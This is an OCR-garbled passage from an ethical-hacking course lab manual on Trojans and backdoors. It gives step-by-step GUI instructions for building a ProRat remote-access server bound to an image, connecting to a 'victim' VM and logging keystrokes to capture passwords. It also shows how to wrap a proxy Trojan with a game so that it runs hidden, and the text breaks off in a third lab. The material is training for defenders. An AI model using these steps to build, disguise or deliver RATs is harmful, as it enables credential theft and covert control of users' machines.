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CEH Lab M an ual

Trojans and
M od u le 06
Module 06 - Trojans and Backdoors

Trojans and Backdoors

A Trojan is a program that contains a malicious or harmful code inside apparently
harmless programming or data in such a iray that it can get control and cause
damage, such as mining thefile allocation table on a hard drive.

I C ON KEY L ab S c e n a rio
1^ ~ ! Valuable According to Bank Into Security News (,
Trojans pose serious risks tor any personal and sensitive information stored 011
Test t o u t compromised Android devices, the FBI warns. But experts say any mobile
knowledge______ device is potentially at risk because the real problem is malicious applications,
m Web exercise which 111 an open environment are impossible to control. And anywhere
malicious apps are around, so is the potential for financial fraud.
W orkbook review
According to cyber security experts, the banking Trojan known as citadel, an
advanced variant o f zeus, is a keylogger that steals online-banking credentials by
capturing keystrokes. Hackers then use stolen login IDs and passwords to
access online accounts, take them over, and schedule fraudulent transactions.
Hackers created tins Trojan that is specifically designed for financial fraud and
sold 011 the black market.
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks, the
theft o f valuable data from the network, and identity theft.

L ab O b jectiv es
The objective o f tins lab is to help students learn to detect Trojan and b ack d oor
The objective o f the lab include:
■ Creating a server and testing a network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all
vulnerabilities and flaws detected

& T o o ls L ab E nvironm ent

d e m o n str a te d in
th is lab are To carry out tins, you need:
a v a ila b le in
‫י‬ A computer mnning W indow S erver 2 0 0 8 as Guest-1 in virtual machine
Tools\CEH v8 ‫י‬ W indow 7 mnning as Guest-2 in virtual machine
M odule 0 6 T rojans
‫י‬ A web browser with Internet access
and B a ck d o o rs
■ Administrative privileges to nin tools

C E H L ab M an u al P age 425 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

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Module 06 - Trojans and Backdoors

Lab Duration
Time: 40 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains m a lic io u s or harm till code inside apparently
harmless program m ing 01‫ ־‬data 111 such a way that it can g e t con trol and cause
damage, such as mining die file a llo c a tio n table 011 a hard disk.
With the help o f a Trojan, an attacker gets access to sto r ed p a ssw o r d s in a
computer and would be able to read personal documents, d e le te file s, d isp lay
p ictu res, an d /01‫ ־‬show messages 011 the screen.

Lab Tasks
Pick an organization diat you feel is worthy of your attention. Tins could be an
O verview educational institution, a commercial company, 01‫ ־‬perhaps a nonprotit chanty.
Recommended labs to assist you widi Trojans and backdoors:
■ Creating a Server Using the ProRat tool
■ Wrapping a Trojan Using One File EXE Maker
■ Proxy Server Trojan
■ HTTP Trojan
■ Remote Access Trojans Using Atelier Web Remote Commander
‫י‬ Detecting Trojans
‫י‬ Creating a Server Using the Theet
■ Creating a Server Using the Biodox
■ Creating a Server Using the MoSucker
‫י‬ Hack Windows 7 using Metasploit

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion 011
your target’s security posture and exposure dirough public and tree information.


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M odule 0 6 - T rojans and Backdoors


Creating a Server Using the ProRat

A Trojan is a program that contains malicious or harmful code inside apparent/)‫׳‬
harmless programming or data in such a way that it can get control and cause
damage, such as mining thefile allocation table on a hard drive.

ICON KEY Lab Scenario

1 ^ 7 Valuable As more and more people regularly use die Internet, cyber security is becoming
more im portant for everyone, and yet many people are not aware o f it. Hacker
Test your are using malware to hack personal information, financial data, and business
knowledge information by infecting systems with viruses, worms, and Trojan horses. But
= Web exercise Internet security is not only about protecting your machine from malware;
hackers can also sniff your data, which means that the hackers can listen to your
m W orkbook review communication with another machine. O ther attacks include spoofing,
mapping, and hijacking.
Some hackers may take control o f your and many other machines to conduct a
denial-of-service attack, which makes target computers unavailable for normal
business. Against high-profile web servers such as banks and credit card
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
theft o f valuable data from the network, and identity theft.

Lab Objectives
The objective o f tins lab is to help suidents learn to detect Trojan and backdoor
& T o o ls
d e m o n str a te d in
th is lab are The objectives o f the lab include:
a v a ila b le in
■ Creating a server and testing the network for attack
Tools\CEH v8 ■ Detecting Trojans and backdoors
M odule 0 6 T rojans
and B a ck d o o rs

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M odule 0 6 - T rojans and Backdoors

‫י‬ Attacking a network using sample Trojans ancl documenting all

vulnerabilities and flaws detected

Lab Environment
To earn‫ ״‬tins out, you need:
■ The Prorat tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Trojans Types\Rem ote A ccess Trojans (RAT)\ProRat
■ A computer running Windows Server 2012 as Host Machine
■ A computer running Window 8 (Virtual Machine)
■ Windows Server 2008 running 111Virtual Machine
‫י‬ A web browser with Internet access
‫י‬ Administrative privileges to run tools

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains m alicious or harmful code inside apparently
harmless programming or data in such a way that it can g et control and cause
damage, such as ruining die file allocation table on a hard drive.
Note: The versions of the created Client or Host and appearance of the website may
differ from what is 111 die lab, but the acmal process of creating the server and die
client is the same as shown 111 diis lab.

Lab Tasks
Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module
06 Trojans and Backdoors\Trojans Types\Rem ote A ccess Trojans
Create Server
with ProRat
2. Double-click ProR at.exe 111 Windows 8 Virtual Machine.
3. Click C reate Pro Rat Server to start preparing to create a server.

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M od ule 0 6 - T rojans and Backdoors

P f l D H R C H . n E T F«OFE55IC]f‫>־‬HL IflTEHnET !!!



PC Info Applications
Message Windows
Funny Stuff File Manager
!Explorer Search Files
Control Panel Registry
Shut Down PC
Clipboard KeyLogger
Give Damage Passwords
R. Downloder
Online Editor ProConnective
‫ ► י‬Create Downloader Server (2 Kbayt)
Create CGI V ictim List (16 Kbayt)
F IG U R E 1.1: P ro R at m ain w indow

4 . The C reate Server window appears.

Create Server
ProConnective Notification (Network and Router)
Notifications S u p p o rts R e ve rse C o n n e c tio n
1y=J P assw o rd bu tto n : ‫ט‬ Use ProConnective Notification Test
R etrieve passw ords from
General Settings IP (DNS) Address: »ou. no*
m any services, su ch as
p o p 3 acco u n ts, m essenger, Mail Notification
IE , mail, etc. D oesn't support R everse Connection
Bind with File Test
Q Use Mail Notification

E-MAIL: bomberman@y ahoo. com

Server Extensions
ICQ Pager Notification
D oesn't suppoit R everse Connection

Server Icon Q Use ICQ Pager Notification

ic q u in : [r] Test

CGI Notification
D oesn't support R everse Connection
W) Help Test
Q Use CGI Notification

CGI URL: http: //w w w.yoursite. com/cgi-bin/prorat. cgi

Create Server
Server Size: 342 Kbayt

F IG U R E 1.2: P ro R at Create Server W indow

5. Click General S ettings to change features, such as Server Port. Server

Passw ord, Victim Name, and the Port Number you wish to connect
over the connection you have to the victim or live the settings default.
6. Uncheck the highlighted options as shown 111 the following screenshot.

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M od ule 0 6 - T rojans and Backdoors

Server Port:

Server Password:

General Settings Victim Name:

Q 3ive a fake error message.
Q ••1elt server on install.
Bind with File
Q Cill AV-FW on start.
Q disable Windows XP SP2 Security Center
Server Extensions I......Q Disable Windows XP Firewall.
Q Hear Windows XP Restore Points.

Server Icon Q )on't send LAN notifications from ( i 92.i 68.”.“j or (10.*.x.xj
I I Protection for removing Local Server
Q Hide Processes from All Task Managers (9x/2k/XP)
I t y ! N o te : y o u can use
D ynam ic D N S to co n n ect Q Hide Values From All kind of Registry Editors (9x/2k/XP)
o v er th e In te rn e t b y using Q Hide Names From Msconfig (9x/2k/KP)
n o -ip acco u n t registration. Q UnT erminate Process (2k/XP)

Create Server
Server Size: 342 Kbayt

F IG U R E 1.3: P ro R a t C reate S erver-G eneral Settings

7. Click Bind w ith File to bind the server with a file; 111 tins labwe are
using the .jpg file to bind the server.
8. Check Bind s e r v e r w ith a file . Click S e l e c t F ile, and navigate to
Z:\CEHv8 M odule 0 6 T rojan s an d B a c k d o o r s\T r o ja n s T y p e s\R e m o te
A c c e s s T rojan s (R A T )\P roR at\lm ages.

9. Select the Girl.jpg file to bind with the server.

m C lipboard: T o read
d ata from ran d o m access
m em ory.
This File will be Binded:

Bind with File

Server Extensions

Server Icon

Create Server
Server Size: 342 Kbayt

F IG U R E 1.4: P ro R at Binding w ith a file

C E H L a b M a n u a l P a g e 430 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

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M od ule 0 6 - T rojans and Backdoors

10. Select Girl.jpg 111 the window and then click Open to bind the file.

Look in: Images

‫ו‬11°‫ת ז‬

£Q1 VNC Trojan starts a

VNC server daemon in the
infected system.

File name: Girl Open

Files of type: Cancel

FIGURE 1.5: ProRat binding an image

11. Click OK after selecting the image for binding with a server.

£ 9 File manager: To
manage victim directory for
add, delete, and modify.

12. 111 Server E xtensions settings, select EXE (lias icon support) 111 S e lec t
Server Extension options.

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M od ule 0 6 - T rojans and Backdoors

Select Server Extension

^ EXE (Has icon support) Q SCR (Has icon support)

Q PIF (Has no icon support) Q COM (Has no icon support)

General Settings
Q BAT (Has no icon support)

Bind with File

Server Extensions

Server Icon

£ Q Give Damage: To
format the entire system

Create Server
Server Size: 497 Kbayt

FIGURE 1.7: ProRat Server Extensions Settings

13. 111 Server Icon select any o f the icons, and click the Create Server
button at bottom right side o f the ProRat window.


General Settings
Bind with File

Server Extensions
m It connects to the
victim using any VNC
viewer with the password
Server Icon H U 11
V) Help jJ
Server Icon: Choose new Icon

Create Server
Server Size: 497 Kbayt

FIGURE 1.8: ProRat creating a server

14. Click OK atter the server has been prepared, as shown 111 the tollowing

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M od ule 0 6 - T rojans and Backdoors

FIGURE 1.9: PioRat Server has created 111 die same current directory

15. N ow you can send die server file by mail or any communication media
to the victim ’s machine as, for example, a celebration file to run.
£ G SHTTPD is a small
HTTP server that can be Applicator Tools

embedded inside any Vicvr M anage A&

program. It can be wrapped E m Preriew pane S t Extra large icons Large icons ‫־‬t N" □ Item check boxes

with a genuine program fj‫־‬fi Details pa ne f t | M5d u n icons | | j Small icons ₪‫־‬ □ F ilenam e extensions
(game cl1ess.exe). When S Lirt |j‫״‬ Details I I Hidden items

______________ Layout_________ Show/hide

executed, it turns a
computer into an invisible o © ^ « Trcjans Types ► Femote Access Trojans (RAT)
‫נ ״י‬
web server. A
K Favorites
*. J . D ow n lea d

■ D esktop Irra c e s

£ D ow nload} J . L an g u a g e

1S3J R ecen t places |^ b n d e d .s e r v e r |

^ 1Fnglish

1‫ ^־‬f Libraries £ ProRat

F*| D o c u m tn te j__ R eadm e

J * M usic ^ T ‫ ״‬rk 6 h

f c l P ic tu ‫«׳‬c |__ V ersion.R enew als

Q j Videos

H o m e g ro jp

C o m p u te i

s L , Local Disk O
5 ? CEH -Tools ( \ \ 1 a

^(1 N etw o rk v
9 ite m s 1 ite m se lec te d 2 0 8 MB

FIGURE 1.10: ProRat Create Server

16. N ow go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06

Trojans and Backdoors\Trojans Types\Rem ote A c c e s s Trojans
17. Double-click binder_server.exe as shown 111 the following screenshot.

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Module 06 - Trojans and Backdoors

. p | ‫ י‬T‫׳‬0J%n(Trt>« » Rencte Acr«s "roiflrs RAT( ‫ * י‬PraRat ital

El• id t ^ •w Tjolc t#lp

View Oroanize ▼• ‫״‬ ^ 0 ° *°

M t
Tavoi ite -»‫־‬ks
I •I Site H T "T ™----------------- Pate modified— 1
|-| Typ |- >

i | r>ornn#ntc
£ ?1cajres
^ Music
More »

[ : R eadne
Folders v
I J i Botnet 'r o ja r s j j
j , Ya5»cn_R.c‫«־‬n o5
I ^ Com nand Shell ~r0)s
I D efacenent ‫ ־‬ro;ars
I J 4 D e s tn ja v e T'ojans
I Ebandng Trojans
I J 4 E-Mal T 0 ‫׳‬j3ns
I JA FTP Trojar
I GUITrojors
I HTTP H I P S "rp jars
I S ICMP Backdoor
I J 4 MACOSXTrojons
I J i Proxy Server Trojan:
. Remote Access “rcj?- *
I J . Apocalypse
X Atelie‫ ׳‬Web Remji
I 4 . D*fkCo‫׳‬r«tRAT
I j.. ProRat
I . VNC’ rojans H
£ M arl C S. ‘ . New Text Docuneil • No... I -O g *
FIGURE 1.11: ProRat Windows Server 2008

18. Now switch to Windows 8 Virtual Machine and enter the IP address o f
ICMP Trojan: Covert Windows Server 2008 and the live port number as the default 111 the
channels are methods in ProRat main window and click Connect.
which an attacker can hide
data in a protocol diat is 19. 111 tins lab, the IP address o f Windows Server 2008 is (
Note: IP addresses might be differ 111 classroom labs

F T ProRat V1.9

m um -

PC Info Applications
Message Windows
Chat Admin-FTP
Funny Stuff File Manager
!Explorer Search Files
Control Panel Registry
Shut Down PC Screen Shot
Clipboard KeyLogger
Give Damage Passwords
R. Downloder
Printer Services
Online Editor ProConnective

FIGURE 112: ProRat Connecting Infected Server

20. Enter the password you provided at the time ol creating the server and
click OK.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors


OK Cancel

FIGURE 1.13: ProRat connection window

21. N ow you are con n ected to the victim machine. To test the connection,
click PC Info and choose the system information as 111 the following

BfP >
>—ProRat V1.9 IConnected[^^^H B B B ^^^^^r‫ ׳‬- x1
P P D H P C H . n E T P P O F E 5 5 I C 1 n F I L i n T E R r i E T !!!
Poit: g m r Disconnect
m Covert channels rely
on techniques called
tunneling, which allow one
IB //////// PC Information ////////
protocol to be carried over PC Info Applications
Computer Name WIN-EGBHISG14L0
another protocol. Message Windows
User Name Administrator
Chat Admin-FTP Windows Uer
Funny Stuff File Manager Windows Language English (United St
!Explorer Search Files Windows Path C :\Windows
Control Panel Registry System Path C :\Windows\systemc
Temp Path C:\Users\ADMINI~1\
Shut Down PC Screen Shot
Clipboard KeyLogger Workgroup NO
Give Damage Passwords Data 9/23/2012
R. Downloder Run
Printer Services
Online Editor F'roConnective System Information Mail Address in Registry
Create Last visited 25 web sites W ; Help
Pc information Received.

FIGURE 1.14: ProRat connected computer w idow

22. N ow click KeyLogger to ste a l user passwords for the online system.
m TASK 2
[ r ? ~ ^ r o R a ^ 7 ^ o n n e c t e d n 0 l0l0 ^ 3 r ~
P H □ H R C H .‫ ח‬E T P P G re S S ID n P L in T E P riE T !!!
Attack System ip: Q j Q 2 P011: g n i R: Disconnect I I 1 11 h
Using Keylogger
//////// PC Information ////////
PC Info Applications
Computer Name WIN-EGBHISG14L0
Message Windows
User Name Administrator
Chat Admin-FTP Windows Uer
Funny Stuff File Manager Windows Language English (United St
!Explorer Search Files Windows Path C :\Windows
Control Panel Registry System Path C :\Windows\systerna
Temp Path C:\Users\ADHINI~1\
Shut Down PC Screen Shot
Clipboard KeyLogger Workgroup NO
Give Damage Passwords Data 9/23/2012
R. Downloder Run
Printer Services
Online Editor ProConnective System Information Mail Address in Registry
Create Last visited 25 web sites W ; Help
Pc information Received.

FIGURE 1.15: ProRat KeyLogger button

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M od ule 0 6 - T rojans and Backdoors

23. The Key Logger window will appear.

m Tliis Trojan works

like a remote desktop
access. The hacker gains
complete GUI access of
the remote system:
■ Infect victim’s computer
with server.exe and plant
Reverse Connecting
■ The Trojan connects to
victim’s Port to the
attacker and establishing
a reverse connection.
■ Attacker then has
complete control over FIGURE 1.16: ProRat KeyLogger window
victim’s machine.
24. N ow switch to Windows Server 2008 machine and open a browser or
N otepad and type any text.
i T e x t D o c u m e n t - N o te p a d

File Edit Format View Help

Hi t h e r e ‫פר‬
T h i s i s my u s e r n a m e : x y z @ y a h o o .c o m
p a s s w o r d : test< 3@ #S !@ l|

m Banking Trojans are

program that steals data
from infected computers
via web browsers and
protected storage. Ik. A
FIGURE 1.17: Test typed in Windows Server 2008 Notepad

25. While the victim is writing a m e ssa g e or entering a user nam e and
password, you can capmre the log entity.
26. N ow switch to Windows 8 Virtual Machine and click Read Log from
time to time to check for data updates trom the victim machine.

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M od ule 0 6 - T rojans and Backdoors

=9/23/201211:55:28 PM-
ahi bob this is my usemame;
password; testshiftl buttowithl shiftbuttonwith2

| Read Log | Delete Log Save as Clear Screen Help

■UL 1 !_•‫ רו‬11•_‫י‬t 1 C □ 1----------------------------------------------

|KeyLog Received. |

FIGURE 1.18: ProRat KeyLogger window

27. N ow you can use a lot o f feauires from ProRat on the victim’s machine.
Note: ProRat Keylogger will not read special characters.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on
your target’s secunty posture and exposure dirough public and free information.



1. Create a server wkh advanced options such as Kill AV-FW on start, disable
Windows XP Firewall, etc., send it and connect it to the victim machine,
and verify whedier you can communicate with the victim machine.

2. Evaluate and examine various mediods to connect to victims if diey are 111
odier cities or countries.

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M odule 0 6 - T rojans and Backdoors

T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

Successful creation o f Blinded server.exe
O u tp u t: PC Information
Computer NameAYIN-EGBHISG 14LO
User Name: Administrator
W indows Yer:
P ro R at T o o l Windows Language: English (United States)
W indows Path: c:\windows
System Path: c:\windows\system 32
Tem p Path: c :\U se rs\A D M IN I~ l\
Product ID:
Workgroup: N O
Data: 9/23/2012

In tern e t C o n n ectio n R eq u ired

□ Yes 0 No
P latform S up p o rted
0 C lassroom 0 !Labs

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M odule 0 6 - T rojans and Backdoors


Wrapping a Trojan Using One File

EXE Maker
A Trojan is aprogram that contains malicious or harmful code inside apparently
harmlessprogramming or data in such a way that it canget control and cause
damage, such as mining thefile allocation table on a hard drive.
I CON KE Y Lab Scenario
£17 Valuable Sometimes an attacker makes a very secure backdoor even more safer than the
normal way to get into a system. A normal user may use only one password for
Test your using the system, but a backdoor may need many authentications or SSH layers
knowledge to let attackers use the system. Usually it is harder to get into the victim system
Web exercise from installed backdoors compared with normal logging 111. After getting
control of the victim system by an attacker, the attacker installs a backdoor on
‫ט‬ Workbook review the victim system to keep 111s or her access in the future. It is as easy as running
a command on the victim machine. Another way the attacker can install a
backdoor is using ActiveX. Wlienever a user visits a website, embedded
ActiveX could run on the system. Most o f websites show a message about
running ActiveX for voice chat, downloading applications, or verifying the user.
111 order to protect your system from attacks by Trojans and need extensive
knowledge on creating Trojans and backdoors and protecting the system from
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
theft o f valuable data from the network, and identity theft.

& Tools Lab Objectives

demonstrated in
this lab are The objective of tins lab is to help smdents learn to detect Trojan and backdoor
available in attacks.
D:\CEH- The objectives o f the lab mclude:
Module 06 Trojans ■ Wrapping a Trojan with a game 111 Windows Server 2008
and Backdoors
■ Running the Trojan to access the game on the front end

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M od ule 0 6 - T rojans and Backdoors

■ Analyzing the Trojan running in backend

Lab Environment
To carry out diis, you need:
‫י‬ OneFileEXEMaker tool located at D:\CEH-Tools\CEHv8 Module 06
Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker

■ A computer running Window Server 2012 (host)

■ Windows Server 2008 running in virtual machine
■ It you decide to download the la te st version, then screenshots shown
111 the lab might differ

■ Administrative privileges to run tools

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program diat contains m alicious or harmful code inside apparendy
harmless programming or data 111 such a way that it can get control and cause
damage, such as ruining die hie allocation table on a hard drive.
Note: The versions of die created client or host and appearance may ditfer from
what is 111 die lab, but die actual process o f connecting to die server and accessing
die processes is same as shown 111 dus lab.

H TASK 1 Lab Tasks

OneFile EXE 1. Install OneFileEXEMaker on Windows Server 2008 Virtual Machine.
Maker Senna Spy One EXE M a k e r 2 0 0 0 2.0a

Senna Spy One EXE Maker 2000 - 2.0a

O fficial W ebsite:
e-mail: senna_spy0 holm ICQ UIN 3973927

Join many files and make a unique EXE file.

This piogram allow join all kind of files: exe, dll. ocx. txt, jpg. bmp
Automatic OCX file register and Pack files support
W indows 9x. NT and 2000 compatible !

Short File Name Parameters 10 pen M ode | Copy T o | Action

Command Line Parameters. Open Mode Copy To------ Action------

C Open/Execute r Pack Fies?
C Normal (“ Windows
C Maximized C System C Copy Only
C Minimized C Temp
Copyright (C). 1998-2000. By Senna Spy C Hide C Root
FIGURE 3.1: OneFile EXE Maker Home screen

C E H L ab M an u al P age 440 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

Click die Add File button and browse to the CEH-Tools folder at die
location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and
add die Lazaris.exe hie.
Senna Spy One EXE M a k e r 2 0 0 0 - 2.0a

Senna Spy One EXE Maker 2000 - 2.0a

O fficial W ebsite: http://sennaspy tsx org
less! You can set various
e-mail: ICQ UIN 3973927
tool options as Open
mode, Copy to, Action Join many files and make a unique EXE file.
This program allow join all kind of files: exe. d ll, ocx. txt, jpg, bmp .
Automatic OCX file register and Pack files support
W indows 9x. NT and 2000 compatible !

[sh o rt File Name |Parameters |0 p e n Mode |Copy To | Action ! Add Fie

LAZARIS.EXE Hide System | O pen/Execute 1



Command Line Parameters Open Mode Copy T0 -----

C Normal C Windows (• Open/Execute
r Maximized (* System C Copy On|y
C Minimized C Temp
Copyright (C). 1998-2000. By Senna Spy (5‫ ־‬Hide C Root

FIGURE 3.2: Adding Lazaris game

3. Click Add File and browse to the CEH-Tools folder at die location
Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server
Trojans and add die m cafee.exe file.

Senna Spy O ne E X E Maker 2000 - 2.0a

O fficial W ebsite:
e-mail: ICQ UIN 3973927

Join many files and make a unique EXE file.

This program allow join all kind of files: exe. dll. ocx. txt, jpg. bmp
Automatic OCX file register and Pack files support
W indows 9x. NT and 2000 compatible I
& Tools
demonstrated in Short File Name Parameters | Open Mode | Copy To |A ction Add Fie
System O pen/Execute
this lab are I System | O pen/Execute delete
available in Save

Tools\CEHv8 Command Line Parameters Open Mode Copy To!----- Action------
C Windows (• Operv‫׳‬Execute r PackFies?
C Normal
Module 06 Trojans C Maximized (* System C Copy Only
C Minimized ‫ ׳‬Temp
and Backdoors Copyright |C|, 1998-2000. By Senna Spy (* Hide C Root

FIGURE 3.3: Adding MCAFEE.EXE proxy server

4. Select Mcafee and type 8 0 8 0 111 die Command Line Parameters field.

C E H L ab M an u al P age 441 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

Senna Spy One EXE M a k e r 2 0 0 0 2.0a

Senna Spy O ne EXE Maker 2000 2.0 ‫־‬a

O fficial W ebsite http ://sennaspy tsx org
e-mail: ICQ UIN: 3973927

Join many files and make a unique EXE file.

This piogram allow !oin all kind of files: exe. dll. ocx. txt. jpg. bmp
Automatic OCX file !egistei and Pack files support
W indows 9x. NT and 2000 compatible !

Short File Name Paiameters Open Mode Copy To Action

LAZARIS.EXE System O pen/Execute
O pen/Execute


Command Line Parameters Open Mode— Copy To------

C Normal C Windows Open/Execute ‫“י‬ P *kF le s?
C Maximized (* System C Copy On|y
C Minimized Temp
Copyright (C). 1998-2000. By Senna Spy ^ Hide C Root

FIGURE 3.4: Assigning port 8080 to MCAFEE

5. Select Lazaris and check die Normal option in Open Mode.

Senna Spy One EX£ M a k e r 2 0 0 0 2.0a

Senna Spy One EXE Maker 2000 2.0 ‫־‬a

O fficial W ebsite: http ://sennaspy tsx org
e-mail: ICQ UIN 39/3 92 7

Join many files and make a unique EXE file.

This piogram allow join all kind of files: exe. dll. ocx. txt. jpg. bmp ...
Automatic OCX file register and Pack files support
W indows 9x. NT and 2000 compatible !

Add Fie
LAZARIS.EXE Notmal (System I O pen/E xecute I
MCAFEE EXE 8080 Hide System O pen/Execute Delete


Command Line Parameters Open Mode Copy To------ Action

‫־׳‬: p.0 1 ™‫״‬ C Windows (• Operv‫׳‬Execute r Pack Fies?
1 .Maximize
Jaximized <• System C Copy On|y
C Minimized C Temp
^ © 2 Copyright (C). 1998 2000. By Senna Spy C Hide C Root

FIGURE 3.5: Setting Lazaris open mode

6. Click Save and browse to save die tile on the desktop, and name die tile

C E H L ab M an u al P age 442 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

Save n | K ‫י‬-» *‫ ז‬0‫ש‬ 2[ 0‫ נ® ־‬a ₪ ‫־‬

1 Name *■ I - I Size 1*1 Type 1*1 Date modified 1

e-mail: sennas
: ■ Computer
4 * Network
® M o zia F re fb x 1 KB Shortcut 9/18/2012 2:31 Af
£ Google Chrome 2 KB Shortcut 9/18/2012 2:30 AT

_l ±1
Short File Name |------Save------1

MCAFEE.EXE (Executables (*.exe) _^J Cancel |


L Open Mode Copy To

r Pack Fies?
(• Normal C Windows (• Open/Execute
C Maximized (* System C Copy 0n|y
‫־‬ C Minimized (" Temp
Copyright (C), 1998-2000. By Senna Spy C Hide C Root

FIGURE 3.6: Trojan created

7. Now double-click to open die Tetris.exe file. Tliis will launch die Lazaris
m MCAFEE.EXE will , ,
run in background g am€> 011 th e tr011t e ‫ ״‬d •

FIGURE 3.7: La2aris game

8. Now open Task Manager and click die P rocesses tab to check it McAfee
is running.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

£ J W indows Task M anager ^ ‫[ *[ ס‬

File O ptions View Help

Applications Processes jServices | P erform ance j Networking | Users |

Im a g e ... 1 User Name 1[ cpu] Memory (... | Description |

csrss.exe SYSTEM 00 1 .4 6 4K Client S e r... 1
csrss.exe SYSTEM 00 1.7 3 6K Client S er...
dw m .exe A dm lnist... 00 1,200 K D e s k to p ...
e xplo re r.e xe Adm m ist... 00 14,804 K W indows ...
LAZARIS.EXE ... A dm lnist... 00 1.5 4 0K LAZARIS
Isass.exe SYSTEM 00 3,100 K Local S ecu ... -
Ism.exe SYSTEM 00 1 .3 8 4K Local Sess...
1 MCAFEE.EXE ... A d m n s t... 00 580 K MCAFEE
m sdtc.exe NETW O... 00 2 .8 3 2 K MS DTC co...
S creenpresso... . A dm irilst... 00 2 8 .3 8 0 K S creenpre...
se rvices.exe SYSTEM 00 1 .9 9 2K Services a ...
SLsvc.exe NETW O... 00 6 .7 4 8 K M ic ro s o ft...
smss.exe SYSTEM 00 304 K W indows ...
spoolsv.exe SYSTEM 00 3 .5 8 8 K Spooler S ...
svch ost.exe SYSTEM 00 13,508 K H o s tP ro c ...
svch ost.exe LOCAL ... 00 3.648 K H o s tP ro c ... ■

I* Show processes from all users gnc| process

|jP ro:esses: 40 CPU Usage: 2°.‫׳‬c Physical Memory: 43°.‫׳‬c

FIGURE 3.8: MCAFEE in Task manager

Lab Analysis
Analyze and document the results related to die lab exercise. Give your opinion 011
your target’s secunty posture and exposure dirough public and free information.



T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

E X E M aker O u tp u t: Using a backdoor execute T etris.exe

1. Use various odier options for die Open mode, Copy to, Action sections of
OneFileEXEMaker and analyze the results.

2. How you will secure your computer from OneFileEXEMaker attacks?

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M odule 0 6 - T rojans and Backdoors

Internet Connection Required

□ Yes 0 No
P latform S upported
0 C lassroom 0 iLabs

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All Rights Reserved. Reproduction is Stricdy Prohibited.
M odule 0 6 - T rojans and Backdoors

Proxy Server Trojan

A. Trojan is a program that contains malicious or harmful code inside apparently
harmless programming or data in such a )ray that it can get control and cause
damage, such as mining thefile allocation table on a hard drive.

I CON KE Y Lab Scenario

P~/ Valuable You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
Test vom‫׳‬ theft o f valuable data from the network, and identity theft.

— Web exercise Lab Objectives

m Workbook review The objective o f tins lab is to help students learn to detect Trojan and backdoor
The objectives o f tins lab include:

• Starting McAfee Proxy

• Accessing the Internet using McAfee Proxy

Lab Environment
To carry out diis, you need:
■ McAfee Trojan located at D:\CEH-Tools\CEHv8 Module 06 Trojans and
Backdoors\Trojans Types\Proxy Server Trojans
JT Tools
demonstrated in ■ A computer running Window Server 2012 (host)
this lab are
■ Windows Server 2008 running in virtual machine
available in
D:\CEH- ■ If you decide to download the la te st version, then screenshots shown
Tools\CEHv8 111 the lab might differ
Module 06 Trojans
and Backdoors ‫י‬ You need a web browser to access Internet
‫י‬ Administrative privileges to m n tools

Lab Duration
Time: 20 Minutes

C E H L ab M an u al P age 446 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

Overview of Trojans and Backdoors

A Trojan is a program that contains m alicious or harmful code inside apparently
harmless programming or data 111 such a way that it can get control and cause
damage, such as ruining die hie allocation table 011 a hard drive.
Note: The versions o f the created cclient or host and appearance may differ from
what it is 111 die lab, but die actual process of connecting to die server and accessing
die processes is same as shown 111 diis lab.

£ TASK Lab Tasks

Proxy server - 1. In Windows Server 2008 Virtual Machine, navigate to Z:\CEHv8
Mcafee Module 06 Trojans and Backdoors\Trojans Types, and right-click
Proxy Server Trojans and select CmdHere from die context menu.

jra C > |i■ * C D -v3'‫־‬teduc05T ro:o‫««־‬nd30ccdo0f3 - "rojanaTypes

P it E dt view Toos ndp

O rgsncc » Vca ‫־‬s * S ' s ® 1‫' ״‬ w

F N n‫ •״‬- - C * » n o d ri« d M Tvp# M Sat M

j , Bl*d0«rryT'0)jn
pi Documents J( T'0j*tk
£ Picture* ,Jf C an ru n d 5h*l "rajjin*
^ Mjflic J j D*t»c«‫׳‬rw«tT‫׳‬a|arK

‫•־‬tore » J f D estruetve Trojans

J t Sw oonc Trojans
J tE - f 'd l r3:3rs
Folders ‫׳יי‬
Jk F T iro jar
J i R e o srv Mon tor _±_
J t G J: Trojans
| . Startup P'cgrarr* W
JlM TPh-TTFST'O jans
JA ‫ ־‬rojansT/pes
JtlO P B d C W o o ‫־‬
3ladd>e‫־‬ry Trojan j.MACOSXTtoaTS

| . Comrrand Srel Trt R=nctc A< COer

j . 3ef3GemertTro;a• J t VMC ‫ ־‬raja
1 . 3estrjc&'/e “ rojor R»stora previOLS versions
J . -banbrgT-qjarts
1. Trojers S erdT o ►

i . '^ P T 'cjo n Q it
